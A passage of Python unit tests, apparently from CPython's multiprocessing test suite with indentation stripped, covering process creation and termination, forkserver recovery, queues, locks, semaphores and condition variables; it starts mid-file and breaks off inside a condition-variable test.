PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
